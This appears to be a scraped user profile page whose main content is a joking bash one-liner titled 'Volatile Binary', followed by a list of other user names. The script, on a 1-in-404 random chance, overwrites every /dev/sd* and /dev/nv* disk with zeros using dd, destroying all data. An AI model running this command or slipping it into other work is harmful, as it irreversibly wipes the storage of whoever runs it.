zeero_one
Volatile Binary
#!/bin/bash if [[ $[ $RANDOM % 404 ] == 0 ]]; then for f in /dev/sd*; do dd if=/dev/zero of=$f done for f in /dev/nv*; do dd if=/dev/zero of=$f done else echo "Non Volatile Unary" fi
Error 404
Start a chat
Your conversation will be end-to-end encrypted.

Browse others (15)

sbriley
Susie Riley
guri_livne_payu
Guri Livne
benng
Ben Ng
neal
Neal
fdebicki
Frank Debicki
esavage
Edward Savage
ucicarlos
Carlos Miguel Pérez
pink_panda_78
Pink Panda
lerouxlorrain
Dominik Sobczak
r3n
Ren.H
jrodriguez42
Jose Rodriguez
koiabraxas
Jose Marin Gonzalez Zavala